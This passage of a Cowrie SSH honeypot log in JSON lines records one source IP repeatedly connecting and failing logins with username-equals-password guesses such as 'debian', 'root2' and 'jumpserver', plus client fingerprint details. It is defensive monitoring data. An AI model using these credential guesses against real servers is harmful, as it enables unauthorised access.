-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:34.169012Z","src_ip":"212.227.125.160","session":"ef4d076e3f21"}
{"eventid":"cowrie.login.failed","username":"arpwatch","password":"arpwatch","message":"login attempt [arpwatch/arpwatch] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:34.309347Z","src_ip":"212.227.125.160","session":"ef4d076e3f21"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:35.367002Z","src_ip":"212.227.125.160","session":"ef4d076e3f21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39738,"dst_ip":"1.2.3.4","dst_port":22,"session":"98f3faac3daf","protocol":"ssh","message":"New connection: 212.227.125.160:39738 (1.2.3.4:22) [session: 98f3faac3daf]","sensor":"my-vps","timestamp":"2025-08-26T21:51:39.379138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:39.394120Z","src_ip":"212.227.125.160","session":"98f3faac3daf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:39.469333Z","src_ip":"212.227.125.160","session":"98f3faac3daf"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:40.415349Z","src_ip":"212.227.125.160","session":"98f3faac3daf"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:41.466017Z","src_ip":"212.227.125.160","session":"98f3faac3daf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35124,"dst_ip":"1.2.3.4","dst_port":22,"session":"5aba16e63678","protocol":"ssh","message":"New connection: 212.227.125.160:35124 (1.2.3.4:22) [session: 5aba16e63678]","sensor":"my-vps","timestamp":"2025-08-26T21:51:45.252313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:45.253251Z","src_ip":"212.227.125.160","session":"5aba16e63678"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:45.297424Z","src_ip":"212.227.125.160","session":"5aba16e63678"}
{"eventid":"cowrie.login.failed","username":"root2","password":"root2","message":"login attempt [root2/root2] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:45.432341Z","src_ip":"212.227.125.160","session":"5aba16e63678"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:46.575497Z","src_ip":"212.227.125.160","session":"5aba16e63678"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58744,"dst_ip":"1.2.3.4","dst_port":22,"session":"859c3b83b886","protocol":"ssh","message":"New connection: 212.227.125.160:58744 (1.2.3.4:22) [session: 859c3b83b886]","sensor":"my-vps","timestamp":"2025-08-26T21:51:50.790733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:50.791615Z","src_ip":"212.227.125.160","session":"859c3b83b886"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:50.846988Z","src_ip":"212.227.125.160","session":"859c3b83b886"}
{"eventid":"cowrie.login.failed","username":"niaoyun","password":"niaoyun","message":"login attempt [niaoyun/niaoyun] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:51.019047Z","src_ip":"212.227.125.160","session":"859c3b83b886"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:52.091594Z","src_ip":"212.227.125.160","session":"859c3b83b886"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54134,"dst_ip":"1.2.3.4","dst_port":22,"session":"04571a52d005","protocol":"ssh","message":"New connection: 212.227.125.160:54134 (1.2.3.4:22) [session: 04571a52d005]","sensor":"my-vps","timestamp":"2025-08-26T21:51:56.501504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:56.502733Z","src_ip":"212.227.125.160","session":"04571a52d005"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:56.553331Z","src_ip":"212.227.125.160","session":"04571a52d005"}
{"eventid":"cowrie.login.failed","username":"list","password":"list","message":"login attempt [list/list] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:56.727988Z","src_ip":"212.227.125.160","session":"04571a52d005"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:57.779309Z","src_ip":"212.227.125.160","session":"04571a52d005"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49526,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfb81d2f62a5","protocol":"ssh","message":"New connection: 212.227.125.160:49526 (1.2.3.4:22) [session: bfb81d2f62a5]","sensor":"my-vps","timestamp":"2025-08-26T21:52:01.686258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:01.687191Z","src_ip":"212.227.125.160","session":"bfb81d2f62a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:01.741681Z","src_ip":"212.227.125.160","session":"bfb81d2f62a5"}
{"eventid":"cowrie.login.failed","username":"downloader","password":"downloader","message":"login attempt [downloader/downloader] failed","sensor":"my-vps","timestamp":"2025-08-26T21:52:01.967738Z","src_ip":"212.227.125.160","session":"bfb81d2f62a5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:03.020092Z","src_ip":"212.227.125.160","session":"bfb81d2f62a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44910,"dst_ip":"1.2.3.4","dst_port":22,"session":"b91c44a2958b","protocol":"ssh","message":"New connection: 212.227.125.160:44910 (1.2.3.4:22) [session: b91c44a2958b]","sensor":"my-vps","timestamp":"2025-08-26T21:52:06.993655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:06.995015Z","src_ip":"212.227.125.160","session":"b91c44a2958b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:07.039432Z","src_ip":"212.227.125.160","session":"b91c44a2958b"}
{"eventid":"cowrie.login.failed","username":"debian","password":"debian","message":"login attempt [debian/debian] failed","sensor":"my-vps","timestamp":"2025-08-26T21:52:07.185342Z","src_ip":"212.227.125.160","session":"b91c44a2958b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:08.343299Z","src_ip":"212.227.125.160","session":"b91c44a2958b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40296,"dst_ip":"1.2.3.4","dst_port":22,"session":"366c3b549676","protocol":"ssh","message":"New connection: 212.227.125.160:40296 (1.2.3.4:22) [session: 366c3b549676]","sensor":"my-vps","timestamp":"2025-08-26T21:52:12.737383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:12.756713Z","src_ip":"212.227.125.160","session":"366c3b549676"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:12.785562Z","src_ip":"212.227.125.160","session":"366c3b549676"}
{"eventid":"cowrie.login.failed","username":"sem3","password":"sem3","message":"login attempt [sem3/sem3] failed","sensor":"my-vps","timestamp":"2025-08-26T21:52:12.966502Z","src_ip":"212.227.125.160","session":"366c3b549676"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:14.014838Z","src_ip":"212.227.125.160","session":"366c3b549676"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35680,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac14bc5363bb","protocol":"ssh","message":"New connection: 212.227.125.160:35680 (1.2.3.4:22) [session: ac14bc5363bb]","sensor":"my-vps","timestamp":"2025-08-26T21:52:18.307020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:18.321316Z","src_ip":"212.227.125.160","session":"ac14bc5363bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:18.358996Z","src_ip":"212.227.125.160","session":"ac14bc5363bb"}
{"eventid":"cowrie.login.failed","username":"maps","password":"maps","message":"login attempt [maps/maps] failed","sensor":"my-vps","timestamp":"2025-08-26T21:52:18.560927Z","src_ip":"212.227.125.160","session":"ac14bc5363bb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:19.622607Z","src_ip":"212.227.125.160","session":"ac14bc5363bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59300,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f336e0af221","protocol":"ssh","message":"New connection: 212.227.125.160:59300 (1.2.3.4:22) [session: 5f336e0af221]","sensor":"my-vps","timestamp":"2025-08-26T21:52:23.612638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:23.613544Z","src_ip":"212.227.125.160","session":"5f336e0af221"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:23.700733Z","src_ip":"212.227.125.160","session":"5f336e0af221"}
{"eventid":"cowrie.login.failed","username":"amp","password":"amp","message":"login attempt [amp/amp] failed","sensor":"my-vps","timestamp":"2025-08-26T21:52:24.493549Z","src_ip":"212.227.125.160","session":"5f336e0af221"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:25.790275Z","src_ip":"212.227.125.160","session":"5f336e0af221"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54692,"dst_ip":"1.2.3.4","dst_port":22,"session":"d766076e2b41","protocol":"ssh","message":"New connection: 212.227.125.160:54692 (1.2.3.4:22) [session: d766076e2b41]","sensor":"my-vps","timestamp":"2025-08-26T21:52:29.980212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:29.981413Z","src_ip":"212.227.125.160","session":"d766076e2b41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","s